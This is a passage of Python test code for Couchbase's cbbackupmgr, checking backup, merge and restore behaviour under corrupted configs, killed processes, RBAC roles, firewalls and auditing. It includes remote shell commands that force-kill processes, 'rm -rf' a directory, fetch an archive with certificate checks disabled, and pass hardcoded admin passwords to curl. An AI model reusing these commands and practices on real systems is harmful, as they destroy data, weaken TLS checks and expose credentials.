self.fail("Failed to backup as the fix in MB-25727")
shell.disconnect()
def test_cbrestoremgr_should_not_change_replica_count_in_restore_bucket(self):
"""
This test is for MB-25809
Set default_bucket=False
Create bucket with 1 replica
Load 10K items to bucket
Backup data from bucket
Create other bucket with 2 replicas in other cluster
Restore data to bucket with 2 replicas
Verify data and bucket setting. It must retain 2 replicas
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=10000)
if not self.new_replicas:
self.fail("This test needs to pass param 'new-replicas' to run")
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.log.info("Start backup cluster")
self.backup_cluster_validate()
self.backup_restore_validate()
self.log.info("replicas from backup bucket: {0}".format(self.num_replicas))
self.log.info("replica in restore bucket should be {0} after restore"\
.format(self.new_replicas))
rest_r = RestConnection(self.backupset.restore_cluster_host)
for bucket in self.buckets:
bucket_stats = rest_r.get_bucket_json(bucket.name)
if self.new_replicas != bucket_stats["replicaNumber"]:
self.fail("replia number in bucket {0} did change after restore"\
.format(bucket.name))
self.log.info("Verified replica in bucket {0}: {1}"\
.format(bucket.name,
bucket_stats["replicaNumber"]))
def test_restore_with_invalid_bucket_config_json(self):
"""
When bucket-config.json in latest backup corrupted,
The merge backups should fail.
1. Create a bucket and load docs into it.
2. Create a backup and validate it.
3. Run full backup
4. Load more docs into bucket
5. Run backup (incremental) and verify.
6. Modify backup-config.json to make invalid json in content
7. Run restore to other bucket, restore should fail with error
"""
gen = BlobGenerator("ent-backup_1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}",
line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
backup_bucket_config_path = self.backupset.directory + "/backup" + \
"/" + self.backups[self.backupset.number_of_backups - 1] + \
"/" + self.buckets[0].name + "-*" \
"/bucket-config.json"
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.log.info("Remore } in bucket-config.json to make it invalid json ")
remote_client.execute_command("sed -i 's/}//' %s " % backup_bucket_config_path)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start + 1,
self.backupset.number_of_backups + 1)
result, output, _ = self.backup_merge()
if result:
self.log.info("Here is the output from command %s " % output[0])
self.fail("merge should failed since bucket-config.json is invalid")
remote_client.disconnect()
def test_restore_with_non_exist_bucket(self):
"""
1. Create a bucket A
2. Load docs to bucket A
3. Do backup bucket A
4. Delete bucket A
5. Restore to bucket A (non exist bucket)
6. Expect errors throw out
"""
gen = BlobGenerator("ent-backup1_", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
self.log.info("Start to delete bucket")
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
output, _ = self.backup_restore()
if output and "Error restoring cluster" not in output[0]:
self.fail("Restore to non exist bucket should fail")
def test_merge_backup_from_old_and_new_bucket(self):
"""
1. Create a bucket A
2. Load docs with key 1
3. Do backup
4. Delete bucket A
5. Re-create bucket A
6. Load docs with key 2
7. Do backup
8. Do merge backup. Verify backup only contain docs key 2
"""
gen = BlobGenerator("ent-backup1_", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
if self.bucket_delete:
self.log.info("Start to delete bucket")
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
BucketOperationHelper.create_bucket(serverInfo=self.master, test_case=self)
elif self.bucket_flush:
self.log.info("Start to flush bucket")
self.bucket_util.flush_all_buckets(self.cluster)
gen = BlobGenerator("ent-backup2_", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("Start to load bucket again with different key")
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_cluster()
self.backupset.number_of_backups += 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start,
self.backupset.number_of_backups + 1)
self.merged = True
result, output, _ = self.backup_merge()
self.backupset.end -= 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup, self.buckets,
self.skip_consistency, self.per_node)
self.log.info("*** Start to validate data in merge backup ")
self.validate_backup_data(self.backupset.backup_host, [self.master],
"ent-backup", False, False, "memory",
self.num_items, "ent-backup1")
self.backup_cluster_validate(skip_backup=True)
def test_merge_backup_with_merge_kill_and_re_merge(self):
"""
1. Create a bucket A
2. Load docs
3. Do backup
4. Load docs
5. Do backup
6. Merge backup
7. Kill merge process
8. Merge backup again
Result: 2nd merge should run ok
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = 2
self.merged = True
merge_threads = []
merge_thread = Thread(target=self.backup_merge)
merge_threads.append(merge_thread)
merge_thread.start()
merge_kill_thread = Thread(target=self._kill_cbbackupmgr)
merge_threads.append(merge_kill_thread)
merge_kill_thread.start()
for merge_thread in merge_threads:
merge_thread.join()
status, output, message = self.backup_list()
if not status:
self.fail(message)
result, output, _ = self.backup_merge()
status, output, message = self.backup_list()
if not status:
self.fail(message)
def test_merge_backup_with_partial_backup(self):
"""
1. Create a bucket A
2. Load docs
3. Do backup
4. Load docs
5. Do backup and kill backup process
6. Merge backup. Merge should fail
"""
gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_threads = []
backup_thread = Thread(target=self.backup_cluster)
backup_threads.append(backup_thread)
backup_thread.start()
backup_kill_thread = Thread(target=self._kill_cbbackupmgr)
backup_threads.append(backup_kill_thread)
backup_kill_thread.start()
for backup_thread in backup_threads:
backup_thread.join()
self.backupset.number_of_backups += 1
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = 3
self.merged = True
status, output, _ = self.backup_merge()
if status:
self.fail("This merge should fail due to last backup killed, not complete yet")
elif "Error merging data: Unable to merge" in output[0]:
self.log.info("Test failed as expected as last backup failed to complete")
status, output, message = self.backup_list()
if not status:
self.fail(message)
def _kill_cbbackupmgr(self):
"""
kill all cbbackupmgr processes
"""
self.sleep(1, "times need for cbbackupmgr process run")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
if self.os_name != "windows":
cmd = "ps aux | grep cbbackupmgr | gawk '{print $2}' | xargs kill -9"
output, _ = shell.execute_command(cmd)
else:
cmd = "tasklist | grep cbbackupmgr | gawk '{printf$2}'"
output, _ = shell.execute_command(cmd)
if output:
kill_cmd = "taskkill /F /T /pid %d " % int(output[0])
output, _ = shell.execute_command(kill_cmd)
if output and "SUCCESS" not in output[0]:
self.fail("Failed to kill cbbackupmgr on windows")
shell.disconnect()
def test_merge_backup_with_purge_deleted_keys(self):
"""
1. Load 100K docs to a bucket A with key 1
2. Delete 50K docs from bucket A
3. Load 50K docs with key 2 to bucket A
4. Take backup
5. Run compaction on each vbucket to purge all delete keys
6. Load again 25K docs with key 3
7. Run backup again
8. Load another 25K docs with key 4
9. Run backup. It should not fail
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
self.log.info("Delete half docs of 1st batch")
delete_gen = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items / 2)
self._load_all_buckets(self.master, delete_gen, "delete", 0)
self.log.info("Load 2nd batch docs")
create_gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size,
end=self.num_items / 2)
self._load_all_buckets(self.master, create_gen2, "create", 0)
self.log.info("Start backup")
self.backup_create()
self.backup_cluster()
nodes = []
upto_seq = 100000
self.log.info("Start compact each vbucket in bucket")
rest = RestConnection(self.master)
cluster_nodes = rest.get_nodes()
for bucket in RestConnection(self.master).get_buckets():
found = self.get_info_in_database(self.backupset.cluster_host, bucket, "deleted")
if found:
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
shell.compact_vbuckets(len(bucket.vbuckets), cluster_nodes, upto_seq)
shell.disconnect()
found = self.get_info_in_database(self.backupset.cluster_host, bucket, "deleted")
if not found:
self.log.info("Load another docs to bucket %s " % bucket.name)
create_gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items / 4)
self._load_bucket(bucket, self.master, create_gen3, "create",
self.expire_time)
self.backup_cluster()
create_gen4 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items / 4)
self._load_bucket(bucket, self.master, create_gen4, "create",
self.expire_time)
self.backup_cluster()
self.backupset.end = 3
status, output, message = self.backup_merge()
if not status:
self.fail(message)
else:
self.fail("cbcompact failed to purge deleted key")
def test_merge_backup_with_failover_logs(self):
"""
1. Load 100K docs into bucket.
2. Wait for all docs persisted.
3. Stop persistence.
4. Load another 100K docs to bucket.
5. Kill memcached will generate about 4 failover logs.
./cbstats localhost:mc_port -u username -p pass failovers | grep num_entries
6. Take backup.
7. Load another 100K docs
8. Take backup again.
Verify:
Only 1st backup is full backup
All backup after would be incremental backup
In 4.5.1, all backups would be full backup
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
failed_persisted_bucket = []
rest = RestConnection(self.master)
cluster_nodes = rest.get_nodes()
for bucket in self.buckets:
ready = RebalanceHelper.wait_for_stats_on_all(self.backupset.cluster_host,
bucket.name, 'ep_queue_size',
0, timeout_in_seconds=120)
if not ready:
failed_persisted_bucket.append(bucket.name)
if failed_persisted_bucket:
self.fail("Buckets %s did not persisted." % failed_persisted_bucket)
self.log.info("Stop persistence at each node")
clusters = copy.deepcopy(cluster_nodes)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
for bucket in self.buckets:
for node in clusters:
shell.execute_command("%scbepctl%s %s:%s -b %s stop" % \
(self.cli_command_location,
self.cmd_ext,
node.ip,
constants.memcached_port,
bucket.name))
shell.disconnect()
self.log.info("Load 2nd batch docs")
create_gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen2, "create", 0)
self.sleep(5)
self.log.info("Crash cluster via kill memcached")
for node in clusters:
for server in self.servers:
if node.ip == server.ip:
num_entries = 4
reach_num_entries = False
while not reach_num_entries:
shell = RemoteMachineShellConnection(server)
shell.kill_memcached()
ready = False
while not ready:
if not RestHelper(RestConnection(server)).is_ns_server_running():
self.sleep(10)
else:
ready = True
cmd = "%scbstats%s %s:%s failovers -u %s -p %s | grep num_entries " \
"| gawk%s '{printf $2}' | grep -m 5 '4\|5\|6\|7'" \
% (self.cli_command_location, self.cmd_ext,
server.ip, constants.memcached_port,
"cbadminbucket", "password", self.cmd_ext)
output, error = shell.execute_command(cmd)
shell.disconnect()
if output:
self.log.info("Number failover logs entries reached. %s" % output)
reach_num_entries = True
self.backup_create()
self.log.info("Start backup data")
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Load 3rd batch docs")
create_gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen3, "create", 0)
self.backup_cluster()
status, output, message = self.backup_list()
if not status:
self.fail(message)
def test_backupmgr_with_short_option(self):
"""
Test short option flags at each option
"""
cmd = "%scbbackupmgr%s " % (self.cli_command_location, self.cmd_ext)
cmd += "%s " % self.input.param("command", "backup")
options = " -%s %s " % (self.input.param("repo", "-repo"),
self.backupset.name)
options += " -%s %s" % (self.input.param("archive", "-archive"),
self.backupset.directory)
if self.input.param("command", "backup") != "list":
options += " -%s http://%s:%s" % (self.input.param("cluster", "-cluster"),
self.backupset.cluster_host.ip,
self.backupset.cluster_host.port)
options += " -%s Administrator" % self.input.param("bkusername", "-username")
options += " -%s password" % self.input.param("bkpassword", "-password")
self.backup_create()
shell = RemoteMachineShellConnection(self.backupset.backup_host)
output, error = shell.execute_command("%s %s " % (cmd, options))
shell.log_command_output(output, error)
shell.disconnect()
if error:
self.fail("There is a error in %s " % error)
def test_backupmgr_help_display(self):
"""
Test display help manual in each option
We do not test compare the whole content but only
few first lines to make sure manual page displayed.
"""
display_option = self.input.param("display", "-h")
if self.input.param("subcommand", None) is None:
subcommand = ""
else:
subcommand = self.input.param("subcommand", None)
cmd = "%scbbackupmgr%s " % (self.cli_command_location, self.cmd_ext)
if display_option == "--help":
display_option = self.long_help_flag
elif display_option == "-h":
self.long_help_flag = self.short_help_flag
cmd += " %s %s " % (subcommand, display_option)
shell = RemoteMachineShellConnection(self.backupset.cluster_host)
output, error = shell.execute_command("%s " % (cmd))
self.log.info("Verify print out help message")
if display_option == "-h":
if subcommand == "":
content = ['cbbackupmgr [<command>] [<args>]', '',
' backup Backup a Couchbase cluster']
elif subcommand == "help":
content = ['cbbackupmgr help [<command>] [<args>]', '',
' archivelayout View the archive directory layout structure']
else:
content = ['cbbackupmgr %s [<args>]' % subcommand, '',
'Required Flags:']
self.validate_help_content(output[:3], content)
elif display_option == "--help":
content = None
if subcommand == "":
content = \
['CBBACKUPMGR(1) Backup Manual CBBACKUPMGR(1)']
self.validate_help_content(output, content)
else:
subcmd_cap = subcommand.upper()
content = \
['CBBACKUPMGR-%s(1) Backup Manual CBBACKUPMGR-%s(1)'
% (subcmd_cap, subcmd_cap)]
self.validate_help_content(output, content)
shell.disconnect()
def test_backup_restore_with_optional_flags(self):
"""
1. Create a bucket
2. Load docs to bucket
3. Backup with optional flags like no-ssl-verify, secure-conn
4. Verify backup data in backup file
"""
self.log.info("Load 1st batch docs")
create_gen1 = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, create_gen1, "create", 0)
self.backup_create()
verify_data = True
output, error = self.backup_cluster()
if self.backupset.secure_conn:
if self.backupset.bk_no_cert:
if self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
elif self._check_output("Error", output):
verify_data = False
else:
if not self._check_output("Backup successfully completed", output):
self.fail("Taking cluster backup failed.")
if verify_data:
self.validate_backup_data(self.backupset.backup_host,
self.servers[:self.nodes_init],
"ent-backup", False, False, "memory",
self.num_items, None)
if self.do_restore:
self.log.info("Restore with secure connection")
self.backup_restore()
def test_restore_with_filter_regex(self):
"""
1. Create a bucket
2. Load docs to bucket with key patterned
3. Backup docs
4. Delete bucket
5. Restore docs with regex
6. Verify only key or value in regex restored to bucket
"""
key_name = "ent-backup"
if self.backupset.random_keys:
key_name = "random_keys"
self.validate_keys = self.input.param("validate_keys", False)
if self.validate_keys:
gen = BlobGenerator(key_name, "ent-backup-", self.value_size,
end=self.num_items)
else:
gen = DocumentGenerator('random_keys', '{{"age": {0}}}', xrange(100),
start=0, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start backup")
self.backup_create()
self.backup_cluster()
self.backup_restore()
self.merged = False
regex_check = self.backupset.filter_keys
if not self.backupset.filter_keys:
regex_check = self.backupset.filter_values
self.validate_backup_data(self.backupset.backup_host,
[self.backupset.restore_cluster_host],
key_name, False, False, "memory",
self.num_items, None,
validate_keys=self.validate_keys,
regex_pattern=regex_check)
def test_backup_with_rbac(self):
"""
1. Create a cluster
2. Create a bucket and load date
3. Create a user with specific role
param in conf: new_user
param in conf: new_role
Roles:
admin, ro_admin, cluster_admin, bucket_full_access[*], bucket_admin[*],
views_admin[*],
replication_admin, roadmin_no_access, cluster_admin_no_access,
bucket_admin_no_access, view_admin_no_access, replication_admin_no_access,
view_replication_admin, replication_ro_admin, bucket_view_replication_admin,
4. Run backup with new user created
5. Verify if backup command handles user role correctly
"""
all_buckets = self.input.param("all_buckets", False)
if self.create_fts_index:
gen = DocumentGenerator('test_docs', '{{"age": {0}}}', xrange(100), start=0,
end=self.num_items)
index_definition = INDEX_DEFINITION
index_name = index_definition['name'] = "age"
rest_fts = RestConnection(self.master)
try:
self.log.info("Create fts index")
rest_fts.create_fts_index(index_name, index_definition)
except Exception, ex:
self.fail(ex)
else:
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
if self.create_views:
self._create_views()
self.backup_create()
if all_buckets:
self.cluster_new_role = self.cluster_new_role + "[*]"
self.log.info("\n***** Create new user: %s with role: %s to do backup *****"
% (self.cluster_new_user, self.cluster_new_role))
testuser = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"password": "password"}]
rolelist = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"roles": "%s" % self.cluster_new_role}]
users_can_backup_all = ["admin", "bucket_full_access[*]",
"data_backup[*]"]
users_can_not_backup_all = ["views_admin[*]", "replication_admin",
"replication_target[*]", "data_monitoring[*]",
"data_writer[*]", "data_reader[*]",
"data_dcp_reader[*]", "fts_searcher[*]",
"fts_admin[*]", "query_manage_index[*]",
"ro_admin", "bucket_admin[*]", "cluster_admin"]
try:
status = self.add_built_in_server_user(testuser, rolelist)
if not status:
self.fail("Fail to add user: %s with role: %s " \
% (self.cluster_new_user,
self.cluster_new_role))
output, error = self.backup_cluster()
success_msg = 'Backup successfully completed'
fail_msg = "Error backing up cluster:"
if self.cluster_new_role in users_can_backup_all:
if not self._check_output(success_msg, output):
self.fail("User %s failed to backup data.\n"
"Here is the output %s " % \
(self.cluster_new_role, output))
elif self.cluster_new_role in users_can_not_backup_all:
if not self._check_output(fail_msg, output):
self.fail("cbbackupmgr failed to block user to backup")
status, _, message = self.backup_list()
if not status:
self.fail(message)
if self.do_verify:
current_vseqno = self.get_vbucket_seqnos(self.cluster_to_backup,
self.buckets,
self.skip_consistency,
self.per_node)
self.log.info("*** Start to validate data in merge backup ")
result = self.validate_backup_data(self.backupset.backup_host,
[self.master],
"ent-backup", False, False, "memory",
self.num_items, None)
self.validate_backup_views()
except Exception as e:
if e:
print "Exception error: ", e
if self.cluster_new_role in users_can_not_backup_all:
error_found = False
error_messages = ["Error backing up cluster: Forbidden",
"Could not find file shard_0.fdb",
"Error backing up cluster: Invalid permissions",
"Database file is empty",
"Error backing up cluster: Unable to find the latest vbucket"]
if self.do_verify:
if str(e) in error_messages:
error_found = True
if not error_found:
raise Exception("cbbackupmgr does not block user role: %s to backup" \
% self.cluster_new_role)
if self.cluster_new_role == "views_admin[*]" and self.create_views:
status, mesg = self.validate_backup_views(self.backupset.backup_host)
if not status:
raise Exception(mesg)
if "Expected error message not thrown" in str(e):
raise Exception("cbbackupmgr does not block user role: %s to backup" \
% self.cluster_new_role)
if self.cluster_new_role in users_can_backup_all:
if not self._check_output(success_msg, output):
self.fail(e)
finally:
self.log.info("Delete new create user: %s " % self.cluster_new_user)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
curl_path = ""
if self.os_name == "windows":
curl_path = self.cli_command_location
cmd = "%scurl%s -g -X %s -u %s:%s http://%s:8091/settings/rbac/users/local/%s" \
% (curl_path,
self.cmd_ext,
"DELETE",
self.master.rest_username,
self.master.rest_password,
self.backupset.cluster_host.ip,
self.cluster_new_user)
output, error = shell.execute_command(cmd)
shell.disconnect()
def test_restore_with_rbac(self):
"""
1. Create a backupdata set.
2. Setup cluster.
3. Restore data back to cluster
Important:
This test need to copy entbackup.zip and entbackup-fts.zip
to /root or /cygdrive/c/Users/Administrator in backup host.
Files location: 172.23.121.227:/root/entba*.zip
"""
all_buckets = self.input.param("all_buckets", False)
self.log.info("Copy backup dataset to tmp dir")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
shell.execute_command("rm -rf %s " % self.backupset.directory)
fts = ""
backup_file = ENT_BKRS
if self.create_fts_index:
backup_file = ENT_BKRS_FTS
fts = "-fts"
backup_dir_found = False
backup_dir = "entbackup" + fts
output, error = shell.execute_command("ls | grep entbackup")
self.log.info("check if %s dir exists on this server " % backup_dir)
if output:
for x in output:
if x == backup_dir:
backup_dir_found = True
if not backup_dir_found:
self.log.info("%s dir does not exist on this server. Downloading.. "
% backup_dir)
shell.execute_command("%s -q %s --no-check-certificate " % (self.wget, backup_file))
shell.execute_command("tar -zxvf %s.tgz " % backup_dir)
if "-" in self.cluster_new_role:
self.cluster_new_role = self.cluster_new_role.replace("-", ",")
shell.check_cmd("unzip")
shell.execute_command("cp -r entbackup%s %s/entbackup" % (fts, self.tmp_path))
output, error = shell.execute_command("cd %s/backup/*/*/data; " \
"unzip shar*.zip" \
% self.backupset.directory)
shell.log_command_output(output, error)
shell.execute_command("echo '' > {0}/logs/backup.log" \
.format(self.backupset.directory))
shell.disconnect()
status, _, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Restore data from backup files")
if all_buckets:
self.cluster_new_role = self.cluster_new_role + "[*]"
self.log.info("\n***** Create new user: %s with role: %s to do backup *****"
% (self.cluster_new_user, self.cluster_new_role))
testuser = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"password": "password"}]
rolelist = [{"id": "%s" % self.cluster_new_user,
"name": "%s" % self.cluster_new_user,
"roles": "%s" % self.cluster_new_role}]
try:
status = self.add_built_in_server_user(testuser, rolelist)
if not status:
self.fail("Fail to add user: %s with role: %s " \
% (self.cluster_new_user,
self.cluster_new_role))
users_can_restore_all = ["admin", "bucket_full_access[*]",
"data_backup[*]"]
users_can_not_restore_all = ["views_admin[*]", "ro_admin",
"replication_admin", "data_monitoring[*]",
"data_writer[*]", "data_reader[*]",
"data_dcp_reader[*]", "fts_searcher[*]",
"fts_admin[*]", "query_manage_index[*]",
"replication_target[*]", "cluster_admin",
"bucket_admin[*]"]
if self.cluster_new_role in users_can_not_restore_all:
self.should_fail = True
output, error = self.backup_restore()
success_msg = 'Restore completed successfully'
fail_msg = "Error restoring cluster:"
failed_persisted_bucket = []
ready = RebalanceHelper.wait_for_stats_on_all(self.backupset.cluster_host,
"default", 'ep_queue_size',
0, timeout_in_seconds=120)
if not ready:
failed_persisted_bucket.append("default")
if failed_persisted_bucket:
self.fail("Buckets %s did not persisted." % failed_persisted_bucket)
self.sleep(3)
rest = RestConnection(self.master)
actual_keys = rest.get_active_key_count("default")
print "\nActual keys in default bucket: %s \n" % actual_keys
if self.cluster_new_role in users_can_restore_all:
if not self._check_output(success_msg, output):
self.fail("User with roles: %s failed to restore data.\n"
"Here is the output %s " % \
(self.cluster_new_role, output))
roles = []
if "," in self.cluster_new_role:
roles = self.cluster_new_role.split(",")
if set(roles) & set(users_can_not_restore_all) and \
set(roles) & set(users_can_restore_all):
if not self._check_output(success_msg, output):
self.fail("User: %s failed to restore data with roles: %s. " \
"Here is the output %s " % \
(self.cluster_new_user, roles, output))
if int(actual_keys) != 1000:
self.fail("User: %s failed to restore data with roles: %s. " \
"Here is the actual docs in bucket %s " % \
(self.cluster_new_user, roles, actual_keys))
elif self.cluster_new_role in users_can_not_restore_all:
if int(actual_keys) == 1000:
self.fail("User: %s with role: %s should not allow to restore data" \
% (self.cluster_new_user,
self.cluster_new_role))
if not self._check_output(fail_msg, output):
self.fail("cbbackupmgr failed to block user to restore")
finally:
self.log.info("Delete new create user: %s " % self.cluster_new_user)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
curl_path = ""
if self.os_name == "windows":
curl_path = self.cli_command_location
cmd = "%scurl%s -g -X %s -u %s:%s http://%s:8091/settings/rbac/users/local/%s" \
% (curl_path,
self.cmd_ext,
"DELETE",
self.master.rest_username,
self.master.rest_password,
self.backupset.cluster_host.ip,
self.cluster_new_user)
output, error = shell.execute_command(cmd)
shell.disconnect()
def test_backup_restore_with_nodes_reshuffle(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Enlists the default zone of current cluster - backsup the cluster and validates
3. Creates a new zone - shuffles cluster host to new zone
4. Restores to cluster host and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
rest_conn = RestConnection(self.backupset.cluster_host)
zones = rest_conn.get_zone_names().keys()
source_zone = zones[0]
target_zone = "test_backup_restore"
self.log.info("Current nodes in group {0} : {1}".format(source_zone,
str(rest_conn.get_nodes_in_zone(source_zone).keys())))
self.log.info("Taking backup with current groups setup")
self.backup_create()
self.backup_cluster_validate()
self.log.info("Creating new zone " + target_zone)
rest_conn.add_zone(target_zone)
self.log.info("Moving {0} to new zone {1}".format(self.backupset.cluster_host.ip, target_zone))
rest_conn.shuffle_nodes_in_zones(["{0}".format(self.backupset.cluster_host.ip)], source_zone, target_zone)
self.log.info("Restoring to {0} after group change".format(self.backupset.cluster_host.ip))
try:
self.backup_restore_validate()
except Exception as ex:
self.fail(str(ex))
finally:
self.log.info("Moving {0} back to old zone {1}".format(self.backupset.cluster_host.ip, source_zone))
rest_conn.shuffle_nodes_in_zones(["{0}".format(self.backupset.cluster_host.ip)], target_zone, source_zone)
self.log.info("Deleting new zone " + target_zone)
rest_conn.delete_zone(target_zone)
def test_backup_restore_with_firewall(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates backupset on backup host
3. Enables firewall on cluster host and validates if backup cluster command throws expected error
4. Disables firewall on cluster host, takes backup and validates
5. Enables firewall on restore host and validates if backup restore command throws expected error
6. Disables firewall on restore host, restores and validates
"""
if self.os_name == "windows" or self.nonroot:
self.log.info("This firewall test does not run on windows or nonroot user")
return
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.log.info("Enabling firewall on cluster host before backup")
RemoteUtilHelper.enable_firewall(self.backupset.cluster_host)
self.enable_firewall = True
try:
output, error = self.backup_cluster()
self.assertTrue(self._check_output("getsockopt: connection refused", output),
"Expected error not thrown by backup cluster when firewall enabled")
finally:
self.log.info("Disabling firewall on cluster host to take backup")
conn = RemoteMachineShellConnection(self.backupset.cluster_host)
conn.disable_firewall()
conn.disconnect()
self.enable_firewall = False
self.log.info("Trying backup now")
self.backup_cluster_validate()
self.log.info("Enabling firewall on restore host before restore")
RemoteUtilHelper.enable_firewall(self.backupset.restore_cluster_host)
self.enable_firewall = True
""" reset restore cluster to same services as backup cluster """
try:
output, error = self.backup_restore()
mesg = "getsockopt: connection refused"
if self.skip_buckets:
mesg = "Error restoring cluster:"
self.assertTrue(self._check_output(mesg, output),
"Expected error not thrown by backup restore when firewall enabled")
finally:
self.log.info("Disabling firewall on restore host to restore")
conn = RemoteMachineShellConnection(self.backupset.restore_cluster_host)
conn.disable_firewall()
conn.disconnect()
self.enable_firewall = False
self.log.info("Trying restore now")
self.skip_buckets = False
""" Need to reset restore node with services the same as in backup cluster """
rest = RestConnection(self.backupset.restore_cluster_host)
rest.force_eject_node()
master_services = self.get_services([self.backupset.cluster_host],
self.services_init, start_node=0)
info = rest.get_nodes_self()
if info.memoryQuota and int(info.memoryQuota) > 0:
self.quota = info.memoryQuota
rest.init_node()
self.sleep(10)
self.backup_restore_validate()
def test_backup_restore_with_audit(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates backupset on backup host
3. Creates a backup of the cluster host - verifies if corresponding entry was created in audit log
4. Restores data on to restore host - verifies if corresponding entry was created in audit log
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
audit_obj = audit(AUDITBACKUPID, self.backupset.cluster_host)
status = audit_obj.getAuditStatus()
self.log.info("Audit status on {0} is {1}".format(self.backupset.cluster_host.ip, status))
if not status:
self.log.info("Enabling audit on {0}".format(self.backupset.cluster_host.ip))
audit_obj.setAuditEnable('true')
self.backup_create()
self.backup_cluster()
field_verified, value_verified = audit_obj.validateEvents(self._get_event_expected_results(action='backup'))
self.assertTrue(field_verified, "One of the fields is not matching")
self.assertTrue(value_verified, "Values for one of the fields is not matching")
audit_obj = audit(AUDITBACKUPID, self.backupset.restore_cluster_host)
status = audit_obj.getAuditStatus()
self.log.info("Audit status on {0} is {1}".format(self.backupset.restore_cluster_host.ip, status))
if not status:
self.log.info("Enabling audit on {0}".format(self.backupset.restore_cluster_host.ip))
audit_obj.setAuditEnable('true')
self.backup_restore()
audit_obj = audit(AUDITRESTOREID, self.backupset.restore_cluster_host)
field_verified, value_verified = audit_obj.validateEvents(self._get_event_expected_results(action='restore'))
self.assertTrue(field_verified, "One of the fields is not matching")
self.assertTrue(value_verified, "Values for one of the fields is not matching")
def _get_event_expected_results(self, action):
if action == 'backup':
expected_results = {
"real_userid:source": "memcached",
"real_userid:user": "default",
"name": "opened DCP connection",
"id": AUDITBACKUPID,
"description": "opened DCP connection",
"timestamp": "{0}".format(self.backups[0]),
"bucket": "{0}".format(self.buckets[0].name),
"sockname": "%s:%s" % (self.backupset.cluster_host.ip,
constants.memcached_port),
"peername": "{0}".format(self.backupset.backup_host.ip)
}
elif action == 'restore':
